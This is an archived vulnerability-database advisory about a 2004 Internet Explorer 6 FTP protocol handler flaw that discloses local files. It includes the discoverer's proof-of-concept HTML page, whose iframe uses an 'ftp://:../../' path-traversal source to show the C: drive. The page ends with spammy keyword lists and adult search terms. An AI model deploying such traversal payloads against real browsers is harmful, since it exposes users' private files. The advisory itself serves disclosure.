about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Microsoft Internet Explorer FTP Protocol Handler Local File Disclosure Weakness


Title Microsoft Internet Explorer FTP Protocol Handler Local File Disclosure Weakness
Published 2004-12-29-12:00AM
Updated 2004-12-29-05:38PM
Class Design Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery is credited to Gregory Panakkal.
Vulnerable  Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Terminal Services
Microsoft Windows 2000 Terminal Services SP1
Microsoft Windows 2000 Terminal Services SP2
Microsoft Windows 98
Microsoft Windows 98SE
Microsoft Windows ME
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Server 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Datacenter Edition 64bit
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Enterprise Edition 64bit
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows XP Home
Microsoft Windows XP Professional
Not Vulnerable  
Code   An exploit is not required.

The following proof of concept is available:
<html>
<head>
<META NAME="COPYRIGHT" CONTENT="JunkCode">
<META NAME="CATEGORY" CONTENT="Freeware Utilities">
<META NAME="SITEINFO" CONTENT="http://crapware.lx.ro">
<META NAME="REVISIT-AFTER"CONTENT="5"days>
<META NAME="AUTHOR"CONTENT="JunkCode">
<META NAME="DESCRIPTION"CONTENT="Contains Freeware Utilities ( PEncrypt, ELFCrypt, Stealth Keyloggers, Trojans, Servers, Password Decryptors, Port Scanner etc... ), Useful Articles, Tutorials, Source Code etc..">
<META NAME="KEYWORDS"CONTENT="Utility, Program, Freeware, Shareware, Adware, Nagware, LCC Win32, Programming, C, C++, Java, Visual C++, Visual Basic, VBScript, JavaScript, CGI, Script, Free, Key Logger, Key Capture, Key Trap, Media, Player, MP3, WAV, AU, MP3Pro, MOV, AVI, MPEG, MPG, Explorer, Norton, Commander, Playlist Editor, Editor, Security, Software, Wrapper, Encryption, Self Extracble, Virus, Virii, Polymorphic, Stealth Keylogger, Stealth, Hidden, Fast, Compact, FP, Fronpage, Frontpage, Many, Microsoft, Sone, There, Those, UNIX, UPLOAD, WindowsNT, agains, also, directories, download, enabled, even, example, extensions, files, holes, horrible, let, list, lot, many, only, others, own, password, running, security, server, sites, vulnerabilities, while, work, Anonymity, privacy, TAZ, encryption,Internet, remailer, remailers, Mixmaster, nymserver, PGP, Proxys, WWW remailing, Mail2News, remailer tools, Paranoia, freedom.net, SSH, Onion Routing, Crowds, ACLU, Enemy of the State, MI5, MI6, Echelon, Anonymous surfing tools, NSA, idenity privacy, nym, EPIC, EFF, AAAS, SAIC, Anonymizer, DHP, CSE, attrition.org, freedom, Big Brother,Privacy International, ZKS, ZKS.net, anonymous, Cypherpunk, Type I, nowhere, Steganography, S-Tools, securenym, hushmail, mixfit, free,using cgi,how to use cgi-bin,how to use cgi,what is cgi,what is cgi,how do i use cgi,using perl scripts,how to use ssi,what is ssi,server side includes,server-side,SSI,severs,serves,common gateway interface,cgibin,cig,scrips,scritps,hosted,host,webmaster,help,unix,IIS,tutorial,instructions,guide,perl,on the fly,NT servers,bestdam,bestdamn,best damn,logger,traffic monitor,page counter,log hits,statistics,web logs,hit counts,hit counter,page statistics,track visitors,visitor count,page hits,hit information,auto e-mail,visitor information,scripts,perl,perl script,cgi-perl,cgi,web hosting,isp,what is cgi-bin,nt,host provider,analyze,analysis,tool,columns,columnar,traffic,webmaster,audit,unix,linux,best dam,NT Server,Windows NT,tutorial,guide,viewer,pearl,conts,conter,vistor,freeware download,server,shareware,keith parkansky,parkansky,keith,patch maker, ICQ, Pager, HTML, encrypt, crypt, CHTML, encode, decode, xor, decrypt, script, kiddie, crackme, cracker, procdump, unpacker, tools, w32intro, softice, anti, debugger, disassembler, w32dasm, pe, encryptor, packer, unpacker, PCGUARD, cryptor, war, northadamus, usa, britain, uk, president, bush, tony, blair, prime, minister, taliban, osama, bin, laden, osama bin laden, al, qaeda, terror, terrorists, WTC, world trade centre, attacks, PEncrypt v4.0, packers, trw2000, softice, trw, unpacker, crash">
<META NAME="ROBOTS"CONTENT="INDEX,FOLLOW">
</head>
<body>
<p align="center"><b><font face="Comic Sans MS"><u>Bypassing IE6-SP1
&quot;file://&quot; protection using &quot;ftp://&quot; !!</u></font></b></p>

<p align="center"><b>Discovered by : Gregory R. Panakkal / junkcode / viper31337</b></p>
<p align="left">Tested on : Windows 2000 SP4 - [NTFS], IE 6 SP1 up-to-date as
per windowsupdate.com</p>
<p align="left">Exploit : If you are able to see the contents of C: in the
iframe below, then you are vulnerable..&nbsp;</p>
<p align="left">[Info : Liu Die Yu tested on WinXP SP2 &amp; Win2003, but
the exploit failed.]</p>
<p align="left">&nbsp;</p>
<iframe src="ftp://:../../../../../../../../../../../"></iframe>
</body>
</html>
<title>
<!-- to remove the dumb lx.ro ads -->
<center>

<!-- Start of StatCounter Code -->
<script type="text/javascript" language="javascript">
var sc_project=347052;
var sc_partition=1;
var sc_invisible=1;
</script>
<script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/counter.js"></script><noscript><a href="http://www.statcounter.com/" target="_blank"><img src="http://c2.statcounter.com/counter.php?sc_project=347052&amp;java=0&amp;invisible=1" alt="free website hit counter" border="0"></a> </noscript>
<!-- End of StatCounter Code -->
<table border="0" style="border:1px solid #ccc;" cellpadding="1" cellspacing="2"><tr><td style="background-color: #eee;color:#333;font:normal normal 300 1em sans-serif">Sit gazduit de <a href="http://www.lx.ro"><font color="blue">LX.Ro</font></a>. Vrei sa ai si tu situl tau? Click <a href="http://www.lx.ro/contnou.php"><font color="blue">aici</font></a>!
</td></tr></table>
</center>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 09:38:48 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.cartoo php-nuke 2 form 200 /compo www.bharat sxywoman njfhm.com www.aoseed www.3plc.c pritty zin SEX.VIDYO PHP/4.4.4- adult only company.ch free seex. Free__ Www Virtual th PHP/4.4.4- localhost Sex777 trisha bat voodo chat tamil act girlandboy all cartoo mengxingsh t344t t397t Videosxxxg www.cshydz (Windows K HAURI Anti haomove.cn saxygirlvi ericsson saxygirlvi mod_cgid C Indiansexp bhanerotic www.ft371. www.lalat. 8.05 www.goxuns www.jjkk36 trshasex.c fieesex Video+SEX pornarb Videosxxxg Adult sex